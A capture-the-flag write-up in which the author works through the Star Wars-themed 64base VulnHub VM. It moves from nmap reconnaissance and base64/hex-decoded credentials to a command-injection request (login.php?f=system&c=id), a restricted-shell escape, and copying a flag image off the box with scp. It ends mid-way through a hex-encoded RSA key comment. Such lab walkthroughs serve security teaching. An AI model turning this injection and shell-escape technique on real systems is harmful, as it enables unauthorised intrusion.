It's been a while since I've been able to work on a vulnhub image. I started looking at recent releases and came across 64base. This VM has a Star Wars theme which is always great. Plus, it was 3mrgnc3's first public VM so I had to check it out!
Flag1
We start off with running Netdiscover to find the IP address of this image:
eric@geoda:~/Documents/vulnhub/64base$ sudo netdiscover -r 192.168.56.0/24 -i vboxnet0 [sudo] password for eric: Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts 2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 120 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.100 08:00:27:ac:0e:b4 1 60 PCS Systemtechnik GmbH 192.168.56.103 08:00:27:68:e7:f8 1 60 PCS Systemtechnik GmbH eric@geoda:~/Documents/vulnhub/64base$
Since the DHCP server is .100, we see that 192.168.56.103 is our target. Let's conduct an nmap scan against this to see what we are working with:
eric@geoda:~/Documents/vulnhub/64base$ sudo nmap -p- -sV 192.168.56.103 Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-30 22:27 CDT Nmap scan report for 192.168.56.103 Host is up (0.00012s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh? 80/tcp open http Apache httpd 2.4.10 ((Debian)) 4899/tcp open radmin? 62964/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0) 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port22-TCP:V=7.40%I=7%D=4/30%Time=5906AB2B%P=x86_64-pc-linux-gnu%r(NULL SF:,15A,"The\x20programs\x20included\x20with\x20the\x20Fedora\x20GNU/Linux SF:\x20system\x20are\x20free\x20software;\nthe\x20exact\x20distribution\x2 SF:0terms\x20for\x20each\x20program\x20are\x20described\x20in\x20the\nindi SF:vidual\x20files\x20in\x20/usr/share/doc/\*/copyright\.\n\nFedora\x20GNU SF:/Linux\x20comes\x20with\x20ABSOLUTELY\x20NO\x20WARRANTY,\x20to\x20the\x SF:20extent\npermitted\x20by\x20applicable\x20law\.\nLast\x20login:\x20Mon SF:\x20Oct\x2024\x2002:04:10\x204025\x20from\x20010\.101\.010\.001\n\n#\n" SF:)%r(GenericLines,15A,"The\x20programs\x20included\x20with\x20the\x20Fed SF:ora\x20GNU/Linux\x20system\x20are\x20free\x20software;\nthe\x20exact\x2 SF:0distribution\x20terms\x20for\x20each\x20program\x20are\x20described\x2 SF:0in\x20the\nindividual\x20files\x20in\x20/usr/share/doc/\*/copyright\.\ SF:n\nFedora\x20GNU/Linux\x20comes\x20with\x20ABSOLUTELY\x20NO\x20WARRANTY SF:,\x20to\x20the\x20extent\npermitted\x20by\x20applicable\x20law\.\nLast\ SF:x20login:\x20Mon\x20Oct\x2024\x2002:04:10\x204025\x20from\x20010\.101\. SF:010\.001\n\n#\n"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port4899-TCP:V=7.40%I=7%D=4/30%Time=5906AB2B%P=x86_64-pc-linux-gnu%r(NU SF:LL,333,"sshhh!\x20ssh!\x20droids!\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n SF:\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ SF:n\nSo\.\.\n\nYou\x20found\x20a\x20way\x20in\x20then\.\.\.\n\nbut,\x20ca SF:n\x20you\x20pop\x20root\?\n\n\n\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/~\\\n\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\|oo\x20\)\x20\x20\x20\x20Did\x20you\x20hear\x2 SF:0that\?\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20_\\=/_\n\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20___\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/\x20\x20_\x20\ SF:x20\\\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20/\x20\(\)\\\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20//\|/\.\\\|\\\\\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_____\|_\x20\x SF:20\x20\x20\x20\x20\x20\x20\\\\\x20\\_/\x20\x20\|\|\n\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\| SF:\x20\|\x20===\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\\\|\\\x20/\|\ SF:x20\|\|\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\|_\|\x20\x20O\x20\x20\|_\|\x20\x20\x20\x20\x SF:20\x20\x20\x20#\x20_\x20_/\x20#\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\|\x20\x20O\x20 SF:\x20\|\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\|\x20\|\n\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\|\|__\*__\|\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\ SF:x20\|\x20\|\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\|~\x20\\___/\x20~\|\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\[\]\|\[\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20 SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20/=\\\x20/=\\\x20/=\\\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\|\x20\|\x20\|\n\x20\x20\x20\x20\x20\x20__ SF:______________\[_\]_\[_\]_\[_\]________/_\]_\[_\\______________________ SF:___\n\n\n"); MAC Address: 08:00:27:68:E7:F8 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.19 seconds eric@geoda:~/Documents/vulnhub/64base$
Very interesting. Looks like we are working with a few ports 22, 80, 4899 and 62964.
I take a quick look at each:
First I check out port 22:
eric@geoda:/tmp$ nc -nv 192.168.56.103 22 (UNKNOWN) [192.168.56.103] 22 (ssh) open The programs included with the Fedora GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001 # HI HI ^C eric@geoda:/tmp$
Appears to be SSH.. or at least pretending to be.
I then check out port 4899:
eric@geoda:/tmp$ nc -nv 192.168.56.103 4899 (UNKNOWN) [192.168.56.103] 4899 (radmin-port) open sshhh! ssh! droids! So.. You found a way in then... but, can you pop root? /~\ |oo ) Did you hear that? _\=/_ ___ / _ \ / ()\ //|/.\|\\ _|_____|_ \\ \_/ || | | === | | \|\ /| || |_| O |_| # _ _/ # || O || | | | ||__*__|| | | | |~ \___/ ~| []|[] /=\ /=\ /=\ | | | ________________[_]_[_]_[_]________/_]_[_\_________________________ eric@geoda:/tmp$
This has 2 droids talking amongst each other, but I'm not sure exactly what this means. I will table this in case it comes in handy later.
I then check out port 62964:
eric@geoda:/tmp$ nc -nv 192.168.56.103 62964 (UNKNOWN) [192.168.56.103] 62964 (?) open SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 HI Protocol mismatch. eric@geoda:/tmp$
Now THIS looks like an SSH service. I will make note of this as my first SSH connection if it comes down to it.
Lastely, let's take a look at port 80. I fire up the browser:
Looking at the title, I see some text that appears to be encoded with base64. I take it to the terminal and decode:
eric@geoda:~/Documents/vulnhub/64base$ echo "dmlldyBzb3VyY2UgO0QK" | base64 -d view source ;D eric@geoda:~/Documents/vulnhub/64base$
It hints for me to view the source.
When checking the page source, I see a comment right below that same sub heading:
5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a
This value appears to be in hexidecimal. The quickest way I think to decode this value is via Burp.
So I fire it up and see that after decoding the hex value, it then produces a base64 string. I took that value and decoded it and we get our first flag!
flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}
Flag 2
After finding flag1, I notice its contents are also in base64. I decode and I'm presented with the following:eric@geoda:~/Documents/vulnhub/64base$ echo "NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==" | base64 -d 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 eric@geoda:~/Documents/vulnhub/64base$
Based off this value, the first thing I think of are credentials. I immediately think about SSH and try logging into the 2 "SSH" ports that we found. Turns out that port 62964 is the correct port running the service. However, this was without success
After a ton of enumeration with dirb and Burp, I found that there were some rabbit holes in regards to the 200 status codes that were presented. I decided to read over the website a bit more and that generating a wordlist may help with further enumeration. I use wget to accomplish this.
I first pull down the first 2 levels of the website:
eric@geoda:~/Documents/vulnhub/64base$ wget -r -l 2 192.168.56.103 --2017-04-30 23:20:49-- http://192.168.56.103/ Connecting to 192.168.56.103:80... connected. HTTP request sent, awaiting response... 200 OK Length: 8159 (8.0K) [text/html] Saving to: ‘192.168.56.103/index.html’ 192.168.56.103/index.html 100%[================================================================================================================>] 7.97K --.-KB/s in 0s 2017-04-30 23:20:49 (1.01 GB/s) - ‘192.168.56.103/index.html’ saved [8159/8159] Loading robots.txt; please ignore errors. --2017-04-30 23:20:49-- http://192.168.56.103/robots.txt Reusing existing connection to 192.168.56.103:80. HTTP request sent, awaiting response... 200 OK Length: 8196 (8.0K) [text/plain] Saving to: ‘192.168.56.103/robots.txt’ [...snippet...] 2017-04-30 23:20:49 (155 MB/s) - ‘192.168.56.103/img/contact-bg.jpg’ saved [95838/95838] FINISHED --2017-04-30 23:20:49-- Total wall clock time: 0.03s Downloaded: 31 files, 1.8M in 0.009s (198 MB/s) eric@geoda:~/Documents/vulnhub/64base$
I then replace any spaces with a new line and sort by unique instances:
eric@geoda:~/Documents/vulnhub/64base$ grep -hr "" 192.168.56.103/| tr '[:space:]' '\n' | sort | uniq > wordlist.txt
Now we just have to remove any html tags and weird characters:
egrep -v '('\,'|'\;'|'\}'|'\{'|'\<'|'\>'|'\:'|'\='|'\"'|'\/'|'\/'|'\['|'\]')' wordlist.txt | sort -u > wordlist-clean.txt
We now have a custom wordlist based off the website:
eric@geoda:~/Documents/vulnhub/64base$ wc -l wordlist-clean.txt 26455 wordlist-clean.txt eric@geoda:~/Documents/vulnhub/64base$
With our custom wordlist created, I turn to Burp and the Intruder to start running through it.
I look at all 200's, 300's and 400's. When searching I notice a 401 status code that caught my eye:
I see that the payload Imperial-Class gives a 401 status code indicating that we are unauthorized to view this page. I navigate to the page to see the reason why:
Ah-ha! A login screen. I remember the "credentials" that were given to us from flag1. I submit the credentials and I'm presented with a new page!
Interesting. So I check its page source and see the following message:
<!DOCTYPE html> <html lang="en"> <body bgcolor=#000000><font color=#cfbf00> <title>64base - login</title> <h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3> <!-- don't forget the BountyHunter login -->
Looks like a hint to me. But what? I added BountyHunter as the next path in the URL and I'm presented with a login screen:
Excellent! Another login screen. I try the same credentials that got me to the page to see if this works
They failed.
However! When navigating to the page source, we notice a comment!
<body bgcolor=#000000><font color=#cfbf00> <form name="login-form" id="login-form" method="post" action="./login.php"> <fieldset> <legend>Please login:</legend> <dl> <dt> <label title="Username">Username: <input tabindex="1" accesskey="u" name="function" type="text" maxlength="50" id="5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756" /> </label> </dt> </dl> <dl> <dt> <label title="Password">Password: <input tabindex="2" accesskey="p" name="command" type="password" maxlength="15" id="584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32" /> </label> </dt> </dl> <dl> <dt> <label title="Submit"> <input tabindex="3" accesskey="l" type="submit" name="cmdlogin" value="Login" /> <!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a --> </label> </dt> </dl> </fieldset> </form>
There's a comment with "basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a"
I noticed it was in hex. I tried to decode it and it appeared to come back in base64. However, when decoding that text, it came back as gibberish. After a while I noticed that the Username and Password ID were both in hex as well. I decided to combine all 3 strings and run the decode again:
Excellent! We have found flag2
flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}
Flag3
Again, we notice the contents of flag2 are base64 encoded. We decode and are presented with the following:eric@geoda:~/Documents/vulnhub/64base$ echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=" | base64 -d https://www.youtube.com/watch?v=vJwytFWA8uA eric@geoda:~/Documents/vulnhub/64base$
A youtube link. Interesting. I check it out and it appears to be calling for Burp.
I fire up Burp and start playing with the Intruder to see if i can find more information about this /Imperial-Class/BountyHunter/ directory.
I noticed that when I went directly to the /index.php directory, a 302 status code redirect was present. And what do we have here.. it's flag3!
flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=}
Flag4
Now that we have flag3, it appears to be yet another base64 encoded string. So I decode it:
eric@geoda:~/Documents/vulnhub/64base$ echo "NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=" | base64 -d 53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id eric@geoda:~/Documents/vulnhub/64base$
Interesting. It appears to say "53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id"
I take this to the browser, however the page does not exist. Hmm. I remember that there was another page that referenced "53cr3t 5h377" which was the WANTED poster found on the main blog:
At the bottom it says "IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377"
I take a stab at it and update the URL to add the parameters f=exec&c=id which were the contents of the flag but replace exec with system instead:
http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=id
Ah-ha! It worked. I see flag4!
flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}
Flag5
Now that we have flag4, it too looks like it's in base64, I'm really starting to see a pattern here! I decode it and I'm left with:
eric@geoda:~/Documents/vulnhub/64base$ echo "NjRiYXNlOjY0YmFzZTVoMzc3Cg==" | base64 -d 64base:64base5h377 eric@geoda:~/Documents/vulnhub/64base$
This looks like credentials again. I try against SSH port 62964 but with no success.
eric@geoda:~/Documents/vulnhub/64base$ ssh 64base@192.168.56.103 -p 62964 64base@192.168.56.103's password: Permission denied, please try again. 64base@192.168.56.103's password: eric@geoda:~/Documents/vulnhub/64base$
After thinking long and hard, I remember that this VM has a lot of base64 encoding. I decide to encode the password "64base5h377" into base64 and try to login again:
eric@geoda:~/Documents/vulnhub/64base$ ssh 64base@192.168.56.103 -p 62964 64base@192.168.56.103's password: Last login: Tue Apr 25 18:26:31 2017 from 192.168.56.1 64base@64base:~$
Success!! I am on the box! Now to begin enumerating around.
The first thing I notice is the restricted shell and lack of commands I can use:
eric@geoda:~$ ssh 64base@192.168.56.103 -p 62964 64base@192.168.56.103's password: Last login: Mon May 1 11:04:18 2017 from 192.168.56.1 64base@64base:~$ clear -rbash: clear: command not found 64base@64base:~$ ls well_done_:D 64base@64base:~$ cd / -rbash: cd: restricted 64base@64base:~$ find / -iname flag5 __________ _xXXXXXXXXXXXXXXXx_ .- | -. _/___________|___________\_ / | __ \ / _____________| /__\ \ / | \__/ \ | | | HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH | | | ___ ___ | \ | | |== | |==/ / \__________| | |__| |__/ / \_________|___|_____________/ \ | / / `-_________|_____/___-' \. \|/ ./ `-+-' I [ ] LS |==| |==]] `-' Cybot Galactica's AC1 "Spy-Eye" Surveillance Droid 64base@64base:~$ whoami -rbash: whoami: command not found 64base@64base:~$ pwd /64base 64base@64base:~$ id -rbash: id: command not found 64base@64base:~$ ls -lah well_done_:D 64base@64base:~$
As you can see, I tried whoami, id, ls, find, cd and many more which I don't have shown.
What is a restricted shell anyway? It's essentially a way to limit the user's ability and allow them only a subset of commands to be executed.
I did some research and found a great write-up by SANS on escaping restricted linux shells:
https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells
The first thing they recommend is to run the "env" command to understand how your profile is configured. So, that's exactly what I do:
64base@64base:~$ env TERM=xterm-256color SHELL=/bin/rbash SSH_CLIENT=192.168.56.1 51084 62964 SSH_TTY=/dev/pts/0 USER=64base LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36: MAIL=/var/mail/64base PATH=/var/alt-bin PWD=/64base LANG=en_GB.UTF-8 GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01 SHLVL=1 HOME=/64base LANGUAGE=en_GB:en LOGNAME=64base SSH_CONNECTION=192.168.56.1 51084 192.168.56.103 62964 _=/var/alt-bin/env 64base@64base:~$
Interesting, it looks like a custom PATH=/var/alt-bin. Usually you would run ls to list the contents of the directory, but since this is restricted, I can still use the echo command with an asterisk to 'glob' directory contents.
64base@64base:~$ echo /var/alt-bin/* /var/alt-bin/awk /var/alt-bin/base64 /var/alt-bin/cat /var/alt-bin/dircolors /var/alt-bin/droids /var/alt-bin/egrep /var/alt-bin/env /var/alt-bin/fgrep /var/alt-bin/file /var/alt-bin/find /var/alt-bin/grep /var/alt-bin/head /var/alt-bin/less /var/alt-bin/ls /var/alt-bin/more /var/alt-bin/perl /var/alt-bin/python /var/alt-bin/ruby /var/alt-bin/tail 64base@64base:~$
Usually, once you know which commands you can execute, I could research each one of them to see if there are known shell escapes associated with them. However, a particular file caught my eye: /var/alt-bin/droids
I run it to see what happens:
64base@64base:~$ /var/alt-bin/droids -rbash: /var/alt-bin/droids: restricted: cannot specify `/' in command names 64base@64base:~$
Bah! That didn't work. But how about just "droids"? Since this is found directly in my $PATH, then I should be able to run droids all by itself without specifyinbg the full path.
I type droids and all of a sudden I'm presented with the matrix:
I was able to escape with ctrl + c and now I'm presented with an ASCII image
64base@64base:~$ droids So.. You found a way in then... but, can you pop root? /~\ |oo ) Did you hear that? _\=/_ ___ / _ \ / ()\ //|/.\|\\ _|_____|_ \\ \_/ || | | === | | \|\ /| || |_| O |_| # _ _/ # || O || | | | ||__*__|| | | | |~ \___/ ~| []|[] /=\ /=\ /=\ | | | ________________[_]_[_]_[_]________/_]_[_\_________________________ 64base@64base:~$
Interesting. What just happened? For some reason I get the urge to run env again since this is where I found the droids path and I'm presented with a properly updated $PATH!
64base@64base:~$ env TERM=xterm-256color SHELL=/bin/rbash SSH_CLIENT=192.168.56.1 51084 62964 SSH_TTY=/dev/pts/0 USER=64base LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36: MAIL=/var/mail/64base PATH=/var/alt-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PWD=/64base LANG=en_GB.UTF-8 GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01 SHLVL=3 HOME=/64base LANGUAGE=en_GB:en LOGNAME=64base SSH_CONNECTION=192.168.56.1 51084 192.168.56.103 62964 _=/var/alt-bin/env 64base@64base:~$
I then use find to look for flag5 again:
64base@64base:~$ /usr/bin/find / -name *flag5* 2>/dev/null /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==} 64base@64base:~$
Excellent! I found flag5:
flag5{TG9vayBJbnNpZGUhIDpECg==}
Flag6
Per usual, I decode flag5:64base@64base:~$ echo "TG9vayBJbnNpZGUhIDpECg==" | base64 -d Look Inside! :D 64base@64base:~$
It is telling me to look inside. What does that mean? I run file on flag5 to see what they mean:
64base@64base:~$ file /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==} /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3 64base@64base:~$
Looks like this is a JPEG image! It also has a weird comment that appears to be in HEX. After I run xxd against it, I notice that the file is in, of course, base64! I decode that too:
64base@64base:~$ echo "4c5330744c5331435255644a546942535530456755464a4a566b4655525342" | xxd -p -r | base64 -d -----BEGIN RSA PRIVATE base64: invalid input 64base@64base:~$
Ah-ha! It looks like the comment is the beginning of a RSA Private Key! Now, the real question is.. how do I extract the entire contents of this image? Usually I would run exiftool against this image but it is not installed.
My next idea is downloading the image locally and examining the file.
So, I start my SSH Server:
eric@geoda:~$ sudo service ssh status ● ssh.service - OpenBSD Secure Shell server Loaded: loaded (/lib/systemd/system/ssh.service; disabled; vendor preset: disabled) Active: active (running) since Tue 2017-05-02 21:04:37 CDT; 1min 18s ago Main PID: 6625 (sshd) Tasks: 1 (limit: 4915) CGroup: /system.slice/ssh.service └─6625 /usr/sbin/sshd -D May 02 21:04:37 geoda systemd[1]: Starting OpenBSD Secure Shell server... May 02 21:04:37 geoda sshd[6625]: Server listening on 0.0.0.0 port 22. May 02 21:04:37 geoda sshd[6625]: Server listening on :: port 22. May 02 21:04:37 geoda systemd[1]: Started OpenBSD Secure Shell server. eric@geoda:~$
and SCP the file on over:
64base@64base:~$ scp /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==} eric@192.168.56.1:/tmp/flag5.jpg Could not create directory '/64base/.ssh'. The authenticity of host '192.168.56.1 (192.168.56.1)' can't be established. ECDSA key fingerprint is 45:44:10:d9:e9:16:02:8b:86:b7:fc:b2:5b:a1:4c:10. Are you sure you want to continue connecting (yes/no)? yes Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts). eric@192.168.56.1's password: flag5{TG9vayBJbnNpZGUhIDpECg==} 100% 192KB 192.0KB/s 00:00 64base@64base:~$
Now that the file has been copied down, I give myself read rights and I run exiftool to completely examine the JPEG:
eric@geoda:/tmp$ ls -lah flag5.jpg -------r-- 1 eric eric 192K May 2 21:07 flag5.jpg eric@geoda:/tmp$ chmod +r flag5.jpg eric@geoda:/tmp$ exiftool flag5.jpg ExifTool Version Number : 10.40 File Name : flag5.jpg Directory : . File Size : 192 kB File Modification Date/Time : 2017:05:02 21:07:52-05:00 File Access Date/Time : 2017:05:02 21:07:52-05:00 File Inode Change Date/Time : 2017:05:02 21:10:34-05:00 File Permissions : r--r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Resolution Unit : inches X Resolution : 72 Y Resolution : 72 Comment : 4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7